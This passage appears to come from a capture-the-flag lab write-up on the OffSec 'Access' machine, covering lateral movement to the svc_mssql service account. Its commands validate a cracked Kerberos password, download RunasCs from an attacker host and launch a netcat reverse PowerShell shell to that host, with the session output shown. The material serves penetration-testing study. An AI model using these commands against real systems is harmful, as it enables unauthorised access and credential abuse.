svc_mssql
Validating the cracked TGS-REP hash of the svc_mssql account.
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/access]
└─$ impacket-getTGT ACCESS.OFFSEC/svc_mssql@server.access.offsec -dc-ip $IP
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
Password: trustno1
[*] Saving ticket in svc_mssql@server.access.offsec.ccacheValidated
TGT generated for the svc_mssql account.
Shell
/Practice/Access/5-Privilege_Escalation/attachments/{A912CA46-6FF3-4380-8ED3-F6FDDED79933}.png)
The built-in runas.exe cannot be used as it prompts for password and skips it
PS C:\tmp> iwr -Uri http://192.168.45.171/RunasCs.exe -OutFile .\RunasCs.exeDelivering RunasCs
PS C:\tmp> .\RunasCs.exe "svc_mssql" trustno1 "cmd /c C:\\tmp\\nc64.exe 192.168.45.171 8888 -e powershell"
[*] Warning: The logon for user 'svc_mssql' is limited. Use the flag combination --bypass-uac and --logon-type '8' to obtain a more privileged token.Invoking a reverse shell
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/access]
└─$ nnc 8888
listening on [any] 8888 ...
connect to [192.168.45.171] from (UNKNOWN) [192.168.224.187] 50592
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.
PS C:\Windows\system32> whoami
whoami
access\svc_mssql
PS C:\Windows\system32> hostname
hostname
SERVER
PS C:\Windows\system32> ipconfig
ipconfig
Windows IP Configuration
Ethernet adapter Ethernet0 2:
Connection-specific DNS Suffix . :
IPv4 Address. . . . . . . . . . . : 192.168.224.187
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 192.168.224.254Lateral Movement made to the svc_mssql account.